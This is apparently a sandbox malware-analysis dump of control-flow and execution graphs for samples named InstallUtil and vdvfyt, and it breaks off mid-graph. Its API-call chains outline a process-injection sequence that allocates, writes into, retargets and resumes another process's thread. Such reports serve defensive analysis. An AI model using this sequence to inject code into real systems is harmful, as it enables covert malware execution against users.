                                                                                                                                  control_flow_graph 1694 128f7b3-128f7bd 1695 128f7c9-128f7cc 1694->1695 1696 128f7bf-128f7c7 1694->1696 1697 128f7cf-128f7d5 1695->1697 1696->1697 1698 128f7de-128f7df 1697->1698 1699 128f7d7 1697->1699 1701 128f84e-128f85c 1698->1701 1699->1698 1700 128f792-128f7a4 1699->1700 1702 128f7ad-128f7ae 1700->1702 1703 128f7a6 1700->1703 1719 128f864-128f868 1701->1719 1702->1701 1703->1698 1703->1700 1703->1702 1704 128f708-128f712 1703->1704 1705 128f76a-128f78a KiUserExceptionDispatcher 1703->1705 1706 128f78c-128f78d 1703->1706 1707 128f741-128f759 1703->1707 1708 128f684-128f68b 1703->1708 1709 128f718 1703->1709 1710 128f71a-128f72b 1703->1710 1711 128f75b-128f768 1703->1711 1712 128f6b0-128f6c3 1703->1712 1713 128f692-128f6ab 1703->1713 1714 128f715-128f716 1703->1714 1715 128f677-128f67d call 1285c88 1703->1715 1704->1714 1705->1706 1706->1719 1707->1705 1707->1711 1708->1713 1724 128f719 1709->1724 1717 128f72d 1710->1717 1718 128f732 1710->1718 1711->1706 1722 128f6ca-128f706 1712->1722 1723 128f6c5 1712->1723 1721 128f735-128f73b 1713->1721 1714->1707 1715->1708 1717->1718 1718->1721 1726 128f86a-128f86f call 1285c88 1719->1726 1727 128f870-128f879 1719->1727 1721->1707 1721->1712 1722->1704 1722->1724 1723->1722 1724->1710 1726->1727
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3286215745.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1280000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f1f293db287c1a95b715df6811d82b7ce91e609fd45d7c3cf5540ae3f56855c0
                                                                                                                                  • Instruction ID: f6d8c4b8ac9db5ad1107b4c65da34b473e501cc6280de8807082962488a6b6de
                                                                                                                                  • Opcode Fuzzy Hash: f1f293db287c1a95b715df6811d82b7ce91e609fd45d7c3cf5540ae3f56855c0
                                                                                                                                  • Instruction Fuzzy Hash: 72513274D22218CFEB18EFA9D5846DDBBB1FF08310F249129E015BB294D7749886CF14

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1733 128c74c 1734 128c80b-128c81c 1733->1734 1735 128c81e 1734->1735 1736 128c823-128c82c 1734->1736 1735->1736 1738 128c832-128c845 1736->1738 1739 128c603-128c628 1736->1739 1742 128c84c-128c867 1738->1742 1743 128c847 1738->1743 1740 128c62a 1739->1740 1741 128c62f-128c666 1739->1741 1740->1741 1751 128c668 1741->1751 1752 128c66d-128c69f 1741->1752 1744 128c869 1742->1744 1745 128c86e-128c882 1742->1745 1743->1742 1744->1745 1749 128c889-128c89f LdrInitializeThunk 1745->1749 1750 128c884 1745->1750 1753 128c8a1-128c99f 1749->1753 1750->1749 1751->1752 1758 128c6a1-128c6c6 1752->1758 1759 128c703-128c716 1752->1759 1756 128c9a1-128c9a6 call 1285c88 1753->1756 1757 128c9a7-128c9b1 1753->1757 1756->1757 1763 128c6c8 1758->1763 1764 128c6cd-128c6fb 1758->1764 1761 128c718 1759->1761 1762 128c71d-128c742 1759->1762 1761->1762 1768 128c751-128c789 1762->1768 1769 128c744-128c745 1762->1769 1763->1764 1764->1759 1770 128c78b 1768->1770 1771 128c790-128c7f1 call 128c148 1768->1771 1769->1738 1770->1771 1777 128c7f8-128c80a 1771->1777 1778 128c7f3 1771->1778 1777->1734 1778->1777
                                                                                                                                  APIs
                                                                                                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 0128C88E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3286215745.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1280000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 50e433e5d6f00be781b4a8e70e7ca6090ee867477299311a0bdb87a6040f7664
                                                                                                                                  • Instruction ID: 3b2d8672ffbc813f8d1552375fa1ac17dc2f11bc8356d8d7db91039e1e791b39
                                                                                                                                  • Opcode Fuzzy Hash: 50e433e5d6f00be781b4a8e70e7ca6090ee867477299311a0bdb87a6040f7664
                                                                                                                                  • Instruction Fuzzy Hash: D2117CB4E221098FDB05EBA8D484AEDBBB9FF88315F54C165E804A7282D770E851CB60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3285681368.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_11fd000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b1dfa138377e91554407a019b5ae18ed22a98a67f2fd3b9ec276e3557ceb06f6
                                                                                                                                  • Instruction ID: 89631a5a1eb307afd9a7f0e2e845cee34136c582e56c60e9fae260f13f2dd5a8
                                                                                                                                  • Opcode Fuzzy Hash: b1dfa138377e91554407a019b5ae18ed22a98a67f2fd3b9ec276e3557ceb06f6
                                                                                                                                  • Instruction Fuzzy Hash: 1D21F271604204DFDF19DF98E980B26BBA5FB84314F24C56DDA094B296C33AD447CB62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3285681368.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_11fd000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4599daf750c858254dd65954a385c4fdae48434fb832d5dc1801ddd9b4f7ea70
                                                                                                                                  • Instruction ID: 15fe4ea8251673dcbe52a5892eef9ead5d1efe3cc8bc180af563b4dc046b7e82
                                                                                                                                  • Opcode Fuzzy Hash: 4599daf750c858254dd65954a385c4fdae48434fb832d5dc1801ddd9b4f7ea70
                                                                                                                                  • Instruction Fuzzy Hash: C2215A755093C08FDB07CB64D994715BF71AB46214F29C5EBD9898F2A3C33A980ACB62

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:10.8%
                                                                                                                                  Dynamic/Decrypted Code Coverage:98.3%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:295
                                                                                                                                  Total number of Limit Nodes:21
                                                                                                                                  execution_graph 62479 618ecd8 62480 618ed26 NtProtectVirtualMemory 62479->62480 62482 618ed70 62480->62482 62483 dbd118 62484 dbd130 62483->62484 62485 dbd18b 62484->62485 62487 6e7d8e0 62484->62487 62488 6e7d908 62487->62488 62491 6e7dd70 62488->62491 62489 6e7d92f 62492 6e7dd9d 62491->62492 62493 6e7ce88 VirtualProtect 62492->62493 62495 6e7df33 62492->62495 62494 6e7df24 62493->62494 62494->62489 62495->62489 62496 6dc0b1f 62497 6dc0b25 62496->62497 62505 6db9398 62497->62505 62511 6db9388 62497->62511 62498 6dc008a 62501 6dbde38 2 API calls 62498->62501 62502 6dbde28 2 API calls 62498->62502 62503 6dbcd53 2 API calls 62498->62503 62504 6dbcd60 2 API calls 62498->62504 62501->62498 62502->62498 62503->62498 62504->62498 62506 6db93ad 62505->62506 62517 6db93d8 62506->62517 62522 6db94c6 62506->62522 62527 6db93c8 62506->62527 62507 6db93c3 62507->62498 62512 6db93ad 62511->62512 62514 6db93d8 2 API calls 62512->62514 62515 6db93c8 2 API calls 62512->62515 62516 6db94c6 2 API calls 62512->62516 62513 6db93c3 62513->62498 62514->62513 62515->62513 62516->62513 62518 6db9402 62517->62518 62519 6db95d7 62518->62519 62532 6dbcac8 62518->62532 62536 6dbcac1 62518->62536 62519->62507 62524 6db94cc 62522->62524 62523 6db95d7 62523->62507 62524->62523 62525 6dbcac8 SleepEx 62524->62525 62526 6dbcac1 SleepEx 62524->62526 62525->62524 62526->62524 62528 6db9402 62527->62528 62529 6db95d7 62528->62529 62530 6dbcac8 SleepEx 62528->62530 62531 6dbcac1 SleepEx 62528->62531 62529->62507 62530->62528 62531->62528 62533 6dbcb08 SleepEx 62532->62533 62535 6dbcb46 62533->62535 62535->62518 62537 6dbcb08 SleepEx 62536->62537 62539 6dbcb46 62537->62539 62539->62518 62438 266db40 62439 266db86 62438->62439 62442 266dd20 62439->62442 62445 266be80 62442->62445 62446 266dd88 DuplicateHandle 62445->62446 62447 266dc73 62446->62447 62448 6e7e2c0 62449 6e7e300 VirtualAlloc 62448->62449 62451 6e7e33a 62449->62451 62157 6dc024c 62158 6dc008a 62157->62158 62163 6dbcd53 62158->62163 62169 6dbcd60 62158->62169 62175 6dbde38 62158->62175 62184 6dbde28 62158->62184 62164 6dbcd75 62163->62164 62193 6dbcfc2 62164->62193 62198 6dbcda0 62164->62198 62203 6dbcd90 62164->62203 62165 6dbcd8b 62165->62158 62170 6dbcd75 62169->62170 62172 6dbcfc2 2 API calls 62170->62172 62173 6dbcd90 2 API calls 62170->62173 62174 6dbcda0 2 API calls 62170->62174 62171 6dbcd8b 62171->62158 62172->62171 62173->62171 62174->62171 62176 6dbde4d 62175->62176 62216 6dbde78 62176->62216 62221 6dbe3d0 62176->62221 62227 6dbe38f 62176->62227 62232 6dbdf2f 62176->62232 62237 6dbdf08 62176->62237 62242 6dbde68 62176->62242 62177 6dbde63 62177->62158 62185 6dbde4d 62184->62185 62187 6dbde78 2 API calls 62185->62187 62188 6dbde68 2 API calls 62185->62188 62189 6dbdf08 2 API calls 62185->62189 62190 6dbdf2f 2 API calls 62185->62190 62191 6dbe38f 2 API calls 62185->62191 62192 6dbe3d0 2 API calls 62185->62192 62186 6dbde63 62186->62158 62187->62186 62188->62186 62189->62186 62190->62186 62191->62186 62192->62186 62195 6dbcfc8 62193->62195 62194 6dbce2b 62194->62165 62195->62194 62208 6dbdaf8 62195->62208 62212 6dbdaf0 62195->62212 62199 6dbcdca 62198->62199 62200 6dbce2b 62199->62200 62201 6dbdaf8 VirtualProtect 62199->62201 62202 6dbdaf0 VirtualProtect 62199->62202 62200->62165 62201->62199 62202->62199 62204 6dbcdca 62203->62204 62205 6dbce2b 62204->62205 62206 6dbdaf8 VirtualProtect 62204->62206 62207 6dbdaf0 VirtualProtect 62204->62207 62205->62165 62206->62204 62207->62204 62209 6dbdb40 VirtualProtect 62208->62209 62211 6dbdb7b 62209->62211 62211->62195 62213 6dbdb40 VirtualProtect 62212->62213 62215 6dbdb7b 62213->62215 62215->62195 62217 6dbdea5 62216->62217 62218 6dbdf01 62217->62218 62219 6dbdaf8 VirtualProtect 62217->62219 62220 6dbdaf0 VirtualProtect 62217->62220 62218->62177 62219->62217 62220->62217 62222 6dbe3d7 62221->62222 62223 6dbdef2 62221->62223 62224 6dbdf01 62223->62224 62225 6dbdaf8 VirtualProtect 62223->62225 62226 6dbdaf0 VirtualProtect 62223->62226 62224->62177 62225->62223 62226->62223 62229 6dbdef2 62227->62229 62228 6dbdf01 62228->62177 62229->62228 62230 6dbdaf8 VirtualProtect 62229->62230 62231 6dbdaf0 VirtualProtect 62229->62231 62230->62229 62231->62229 62233 6dbdef2 62232->62233 62234 6dbdf01 62233->62234 62235 6dbdaf8 VirtualProtect 62233->62235 62236 6dbdaf0 VirtualProtect 62233->62236 62234->62177 62235->62233 62236->62233 62238 6dbdef2 62237->62238 62239 6dbdf01 62238->62239 62240 6dbdaf8 VirtualProtect 62238->62240 62241 6dbdaf0 VirtualProtect 62238->62241 62239->62177 62240->62238 62241->62238 62243 6dbdea5 62242->62243 62244 6dbdf01 62243->62244 62245 6dbdaf8 VirtualProtect 62243->62245 62246 6dbdaf0 VirtualProtect 62243->62246 62244->62177 62245->62243 62246->62243 62552 266b3b0 62555 266b4a8 62552->62555 62553 266b3bf 62556 266b4b9 62555->62556 62559 266b4dc 62555->62559 62564 2669764 62556->62564 62559->62553 62560 266b4d4 62560->62559 62561 266b6e0 GetModuleHandleW 62560->62561 62562 266b70d 62561->62562 62562->62553 62565 266b698 GetModuleHandleW 62564->62565 62567 266b4c4 62565->62567 62567->62559 62568 266b740 62567->62568 62569 2669764 GetModuleHandleW 62568->62569 62570 266b754 62569->62570 62570->62560 62247 6dc02cb 62248 6dc02d5 62247->62248 62252 6186468 62248->62252 62258 6186466 62248->62258 62249 6dc0331 62253 618647d 62252->62253 62264 61864a8 62253->62264 62268 6186498 62253->62268 62272 61865d3 62253->62272 62254 6186493 62254->62249 62259 618647d 62258->62259 62261 6186498 9 API calls 62259->62261 62262 61864a8 9 API calls 62259->62262 62263 61865d3 9 API calls 62259->62263 62260 6186493 62260->62249 62261->62260 62262->62260 62263->62260 62266 61864d2 62264->62266 62265 6186514 62265->62254 62266->62265 62276 61879d0 62266->62276 62270 61864d2 62268->62270 62269 6186514 62269->62254 62270->62269 62271 61879d0 9 API calls 62270->62271 62271->62270 62274 6186505 62272->62274 62273 6186514 62273->62254 62274->62273 62275 61879d0 9 API calls 62274->62275 62275->62274 62277 61879f5 62276->62277 62278 6187a17 62277->62278 62288 6187ea9 62277->62288 62291 6187c75 62277->62291 62294 6187c25 62277->62294 62297 6187c41 62277->62297 62300 6187a30 62277->62300 62303 6187a1f 62277->62303 62306 6187d4d 62277->62306 62309 6187b4b 62277->62309 62312 6187aba 62277->62312 62278->62266 62289 6187a9b 62288->62289 62315 6188380 62289->62315 62292 6187a9b 62291->62292 62293 6188380 9 API calls 62292->62293 62293->62292 62295 6187a9b 62294->62295 62296 6188380 9 API calls 62295->62296 62296->62295 62298 6187a9b 62297->62298 62299 6188380 9 API calls 62298->62299 62299->62298 62301 6187a5d 62300->62301 62302 6188380 9 API calls 62301->62302 62302->62301 62304 6187a30 62303->62304 62305 6188380 9 API calls 62304->62305 62305->62304 62307 6187a9b 62306->62307 62308 6188380 9 API calls 62307->62308 62308->62307 62310 6187a9b 62309->62310 62311 6188380 9 API calls 62310->62311 62311->62310 62313 6187a9b 62312->62313 62314 6188380 9 API calls 62313->62314 62314->62313 62316 61883a5 62315->62316 62328 6188b2d 62316->62328 62333 618948c 62316->62333 62338 6188938 62316->62338 62342 6188e37 62316->62342 62347 6188747 62316->62347 62351 61888b7 62316->62351 62356 6189065 62316->62356 62361 61885e5 62316->62361 62366 6188a04 62316->62366 62371 61892b2 62316->62371 62317 61883c7 62317->62289 62329 6188b3a 62328->62329 62330 61888dd 62328->62330 62330->62328 62376 6160bc0 62330->62376 62380 6160bba 62330->62380 62334 6189496 62333->62334 62335 6189604 62333->62335 62334->62317 62384 713ff28 62335->62384 62339 6188942 62338->62339 62341 713ff28 VirtualAllocEx 62339->62341 62340 61896aa 62341->62340 62343 6188e46 62342->62343 62388 618ff08 62343->62388 62392 618ff02 62343->62392 62344 6188596 62348 618962a 62347->62348 62350 713ff28 VirtualAllocEx 62348->62350 62349 61896aa 62350->62349 62352 61888c1 62351->62352 62353 6188b3a 62352->62353 62354 6160bc0 NtResumeThread 62352->62354 62355 6160bba NtResumeThread 62352->62355 62354->62352 62355->62352 62357 618907d 62356->62357 62396 6189bb0 62357->62396 62401 6189bc0 62357->62401 62358 6189095 62362 61885f4 62361->62362 62424 6160150 62362->62424 62428 6160148 62362->62428 62363 618868d 62363->62317 62367 6188a13 62366->62367 62369 6160150 WriteProcessMemory 62367->62369 62370 6160148 WriteProcessMemory 62367->62370 62368 6188ab7 62368->62317 62369->62368 62370->62368 62372 61892c1 62371->62372 62374 618ff08 Wow64SetThreadContext 62372->62374 62375 618ff02 Wow64SetThreadContext 62372->62375 62373 61892ed 62374->62373 62375->62373 62377 6160be9 NtResumeThread 62376->62377 62379 6160c3d 62377->62379 62379->62330 62381 6160bbe NtResumeThread 62380->62381 62383 6160c3d 62381->62383 62383->62330 62385 713ff68 VirtualAllocEx 62384->62385 62387 61896aa 62385->62387 62389 618ff4d Wow64SetThreadContext 62388->62389 62391 618ff95 62389->62391 62391->62344 62393 618ff08 Wow64SetThreadContext 62392->62393 62395 618ff95 62393->62395 62395->62344 62397 6189bbe 62396->62397 62398 6189bf9 62397->62398 62406 6189cf7 62397->62406 62411 6189d73 62397->62411 62398->62358 62402 6189bd7 62401->62402 62403 6189bf9 62402->62403 62404 6189d73 2 API calls 62402->62404 62405 6189cf7 2 API calls 62402->62405 62403->62358 62404->62403 62405->62403 62407 6189d06 62406->62407 62416 618f740 62407->62416 62420 618f734 62407->62420 62412 6189d9b 62411->62412 62414 618f740 CreateProcessA 62412->62414 62415 618f734 CreateProcessA 62412->62415 62413 618a2c9 62414->62413 62415->62413 62417 618f795 CreateProcessA 62416->62417 62419 618f92c 62417->62419 62421 618f737 CreateProcessA 62420->62421 62423 618f92c 62421->62423 62425 6160198 WriteProcessMemory 62424->62425 62427 61601ef 62425->62427 62427->62363 62429 616014d WriteProcessMemory 62428->62429 62431 61601ef 62429->62431 62431->62363 62458 6bc6100 62459 6bc611a 62458->62459 62460 6bc612a 62459->62460 62462 6e7181e 62459->62462 62465 6e7ce88 62462->62465 62467 6e7ceaf 62465->62467 62469 6e7d2d8 62467->62469 62470 6e7d320 VirtualProtect 62469->62470 62472 6e71833 62470->62472 62577 6dc00a0 62578 6dc008a 62577->62578 62579 6dbde38 2 API calls 62578->62579 62580 6dbde28 2 API calls 62578->62580 62581 6dbcd53 2 API calls 62578->62581 62582 6dbcd60 2 API calls 62578->62582 62579->62578 62580->62578 62581->62578 62582->62578
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                  • API String ID: 0-3443518476
                                                                                                                                  • Opcode ID: 653b0d696e2810f0527c2e074a954bafb6d0de13e65c43689905867606e76168
                                                                                                                                  • Instruction ID: 91a4b87a5fc5626408331e9f51b29517f5d02226def9cabda9c9309cd46a0d05
                                                                                                                                  • Opcode Fuzzy Hash: 653b0d696e2810f0527c2e074a954bafb6d0de13e65c43689905867606e76168
                                                                                                                                  • Instruction Fuzzy Hash: D0B22674A00259CFDB58CFA9C894BADB7B6FF88310F158599E505AB2A5CB70EC81CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2514129301.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6dc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                                                                                                  • API String ID: 0-324474496
                                                                                                                                  • Opcode ID: d1ad767ebac6c9803cbc2f7401ecef66ea1a1a7962733b1eb0857e5bc99a95d6
                                                                                                                                  • Instruction ID: 5f2aa0e4b80c132cb53a494e08e763c8fa691ffad16551392c0e8baf323be104
                                                                                                                                  • Opcode Fuzzy Hash: d1ad767ebac6c9803cbc2f7401ecef66ea1a1a7962733b1eb0857e5bc99a95d6
                                                                                                                                  • Instruction Fuzzy Hash: 8E220B74A00259CFDB54DF69C984BADB7B2FF88310F1481A9E509AB2A5DB31ED81CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1175 6bc9e18-6bc9e39 1176 6bc9e3b 1175->1176 1177 6bc9e40-6bc9f27 1175->1177 1176->1177 1179 6bc9f2d-6bca06e call 6bc6750 1177->1179 1180 6bca629-6bca651 1177->1180 1226 6bca074-6bca0cf 1179->1226 1227 6bca5f2-6bca61c 1179->1227 1183 6bcad57-6bcad60 1180->1183 1184 6bca65f-6bca669 1183->1184 1185 6bcad66-6bcad7d 1183->1185 1187 6bca66b 1184->1187 1188 6bca670-6bca764 call 6bc6750 1184->1188 1187->1188 1209 6bca78e 1188->1209 1210 6bca766-6bca772 1188->1210 1213 6bca794-6bca7b4 1209->1213 1211 6bca77c-6bca782 1210->1211 1212 6bca774-6bca77a 1210->1212 1215 6bca78c 1211->1215 1212->1215 1218 6bca814-6bca894 1213->1218 1219 6bca7b6-6bca80f 1213->1219 1215->1213 1240 6bca8eb-6bca92e call 6bc6750 1218->1240 1241 6bca896-6bca8e9 1218->1241 1230 6bcad54 1219->1230 1234 6bca0d4-6bca0df 1226->1234 1235 6bca0d1 1226->1235 1237 6bca61e 1227->1237 1238 6bca626 1227->1238 1230->1183 1239 6bca507-6bca50d 1234->1239 1235->1234 1237->1238 1238->1180 1242 6bca0e4-6bca102 1239->1242 1243 6bca513-6bca58f 1239->1243 1269 6bca939-6bca942 1240->1269 1241->1269 1247 6bca159-6bca16e 1242->1247 1248 6bca104-6bca108 1242->1248 1285 6bca5dc-6bca5e2 1243->1285 1251 6bca175-6bca18b 1247->1251 1252 6bca170 1247->1252 1248->1247 1249 6bca10a-6bca115 1248->1249 1253 6bca14b-6bca151 1249->1253 1256 6bca18d 1251->1256 1257 6bca192-6bca1a9 1251->1257 1252->1251 1260 6bca117-6bca11b 1253->1260 1261 6bca153-6bca154 1253->1261 1256->1257 1258 6bca1ab 1257->1258 1259 6bca1b0-6bca1c6 1257->1259 1258->1259 1265 6bca1cd-6bca1d4 1259->1265 1266 6bca1c8 1259->1266 1263 6bca11d 1260->1263 1264 6bca121-6bca139 1260->1264 1268 6bca1d7-6bca242 1261->1268 1263->1264 1270 6bca13b 1264->1270 1271 6bca140-6bca148 1264->1271 1265->1268 1266->1265 1272 6bca244-6bca250 1268->1272 1273 6bca256-6bca40b 1268->1273 1275 6bca9a2-6bca9b1 1269->1275 1270->1271 1271->1253 1272->1273 1283 6bca40d-6bca411 1273->1283 1284 6bca46f-6bca484 1273->1284 1276 6bca944-6bca96c 1275->1276 1277 6bca9b3-6bcaa3b 1275->1277 1280 6bca96e 1276->1280 1281 6bca973-6bca99c 1276->1281 1313 6bcabb4-6bcabc0 1277->1313 1280->1281 1281->1275 1283->1284 1291 6bca413-6bca422 1283->1291 1289 6bca48b-6bca4ac 1284->1289 1290 6bca486 1284->1290 1287 6bca5e4-6bca5ea 1285->1287 1288 6bca591-6bca5d9 1285->1288 1287->1227 1288->1285 1292 6bca4ae 1289->1292 1293 6bca4b3-6bca4d2 1289->1293 1290->1289 1295 6bca461-6bca467 1291->1295 1292->1293 1299 6bca4d9-6bca4f9 1293->1299 1300 6bca4d4 1293->1300 1297 6bca469-6bca46a 1295->1297 1298 6bca424-6bca428 1295->1298 1302 6bca504 1297->1302 1304 6bca42a-6bca42e 1298->1304 1305 6bca432-6bca453 1298->1305 1306 6bca4fb 1299->1306 1307 6bca500 1299->1307 1300->1299 1302->1239 1304->1305 1308 6bca45a-6bca45e 1305->1308 1309 6bca455 1305->1309 1306->1307 1307->1302 1308->1295 1309->1308 1314 6bcabc6-6bcac21 1313->1314 1315 6bcaa40-6bcaa49 1313->1315 1330 6bcac58-6bcac82 1314->1330 1331 6bcac23-6bcac56 1314->1331 1316 6bcaa4b 1315->1316 1317 6bcaa52-6bcaba8 1315->1317 1316->1317 1318 6bcaa9d-6bcaadd 1316->1318 1319 6bcaa58-6bcaa98 1316->1319 1320 6bcab27-6bcab67 1316->1320 1321 6bcaae2-6bcab22 1316->1321 1335 6bcabae 1317->1335 1318->1335 1319->1335 1320->1335 1321->1335 1339 6bcac8b-6bcad1e 1330->1339 1331->1339 1335->1313 1343 6bcad25-6bcad45 1339->1343 1343->1230
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2513377940.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_6bc0000_vdvfyt.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: TJbq$Te]q$paq$xb`q
                                                                                                                                  • API String ID: 0-4160082283
                                                                                                                                  • Opcode ID: 905552fc825abf475ed9b1eba3c3b33e464ad21769b3be46a7893d8ca3134500
                                                                                                                                  • Instruction ID: 1bdca5cf0c10d1af2d82e0ba3945c7764231d2fa216470b6c769ad69cd901830
                                                                                                                                  • Opcode Fuzzy Hash: 905552fc825abf475ed9b1eba3c3b33e464ad21769b3be46a7893d8ca3134500
                                                                                                                                  • Instruction Fuzzy Hash: BBA2C775E00228CFDB65CF69C984A99BBB2FF89310F1581E9D509AB325DB319E81CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1903 6dc9610-6dc962a 1904 6dc962c-6dc9633 1903->1904 1905 6dc9636-6dc9642 1903->1905 1907 6dc969e-6dc96a1 1905->1907 1908 6dc9644-6dc9651 1905->1908 1909 6dc96b4-6dc96b7 1907->1909 1910 6dc96a3-6dc96a5 1907->1910 1917 6dc986f-6dc98a7 1908->1917 1918 6dc9657-6dc9687 1908->1918 1912 6dc96dd-6dc96e0 1909->1912 1913 6dc96b9-6dc96d7 1909->1913 1916 6dc96ad 1910->1916 1914 6dc9865-6dc986c 1912->1914 1915 6dc96e6-6dc96ec 1912->1915 1913->1912 1921 6dc98ae-6dc98f9 1913->1921 1915->1914 1920 6dc96f2-6dc96fb 1915->1920 1916->1909 1917->1921 1944 6dc9689-6dc9692 1918->1944 1945 6dc9694-6dc9697 1918->1945 1927 6dc96fd-6dc970c 1920->1927 1928 6dc9733-6dc9739 1920->1928 1951 6dc98fb-6dc9908 1921->1951 1952 6dc9932-6dc9934 1921->1952 1927->1928 1938 6dc970e-6dc9727 1927->1938 1930 6dc973f-6dc9748 1928->1930 1931 6dc9844-6dc984a 1928->1931 1930->1931 1940 6dc974e-6dc975a 1930->1940 1931->1914 1935 6dc984c-6dc985c 1931->1935 1935->1914 1947 6dc985e-6dc9863 1935->1947 1938->1928 1950 6dc9729-6dc972c 1938->1950 1953 6dc97f8-6dc983c 1940->1953 1954 6dc9760-6dc9788 1940->1954 1944->1907 1945->1907 1947->1914 1950->1928 1951->1952 1959 6dc990a-6dc9930 1951->1959 1955 6dc9d7f-6dc9d86 1952->1955 1953->1931 1954->1953 1966 6dc978a-6dc97c7 1954->1966 1959->1952 1971 6dc9939-6dc996d 1959->1971 1966->1953 1978 6dc97c9-6dc97f6 1966->1978 1979 6dc9a10-6dc9a1f 1971->1979 1980 6dc9973-6dc997c 1971->1980 1978->1931 1985 6dc9a5e 1979->1985 1986 6dc9a21-6dc9a37 1979->1986 1981 6dc9d87-6dc9d96 1980->1981 1982 6dc9982-6dc9995 1980->1982 1991 6dc99fe-6dc9a0a 1982->1991 1992 6dc9997-6dc99b0 1982->1992 1990 6dc9a60-6dc9a65 1985->1990 1997 6dc9a39-6dc9a55 1986->1997 1998 6dc9a57-6dc9a5c 1986->1998 1994 6dc9aa8-6dc9ac4 1990->1994 1995 6dc9a67-6dc9a88 1990->1995 1991->1979 1991->1980 1992->1991 2011 6dc99b2-6dc99c0 1992->2011 2004 6dc9b8c-6dc9b95 1994->2004 2005 6dc9aca-6dc9ad3 1994->2005 1995->1994 2015 6dc9a8a 1995->2015 1997->1990 1998->1990 2007 6dc9d7d 2004->2007 2008 6dc9b9b 2004->2008 2005->1981 2009 6dc9ad9-6dc9af6 2005->2009 2007->1955 2012 6dc9ba9-6dc9bb7 call 6dc6cc0 2008->2012 2013 6dc9c06-6dc9c14 call 6dc6cc0 2008->2013 2014 6dc9ba2-6dc9ba4 2008->2014 2035 6dc9afc-6dc9b12 2009->2035 2036 6dc9b7a-6dc9b86 2009->2036 2011->1991 2021 6dc99c2-6dc99c6 2011->2021 2026 6dc9bcf-6dc9bd2 2012->2026 2027 6dc9bb9-6dc9bbf 2012->2027 2028 6dc9c2c-6dc9c2f 2013->2028 2029 6dc9c16-6dc9c1c 2013->2029 2014->1955 2020 6dc9a8d-6dc9aa6 2015->2020 2020->1994 2021->1981 2025 6dc99cc-6dc99e5 2021->2025 2025->1991 2062 6dc99e7-6dc99fb call 6dc5af0 2025->2062 2037 6dc9bdb-6dc9be9 call 6dc6cc0 2026->2037 2038 6dc9bd4-6dc9bd6 2026->2038 2031 6dc9bc1 2027->2031 2032 6dc9bc3-6dc9bc5 2027->2032 2039 6dc9c35-6dc9c43 call 6dc6cc0 2028->2039 2040 6dc9cc0-6dc9cd1 call 6dc6cc0 2028->2040 2033 6dc9c1e 2029->2033 2034 6dc9c20-6dc9c22 2029->2034 2031->2026 2032->2026 2033->2028 2034->2028 2035->2036 2066 6dc9b14-6dc9b22 2035->2066 2036->2004 2036->2005 2049 6dc9beb-6dc9bf1 2037->2049 2050 6dc9c01 2037->2050 2038->1955 2051 6dc9c5b-6dc9c6e call 6dc6cc0 2039->2051 2052 6dc9c45-6dc9c4b 2039->2052 2054 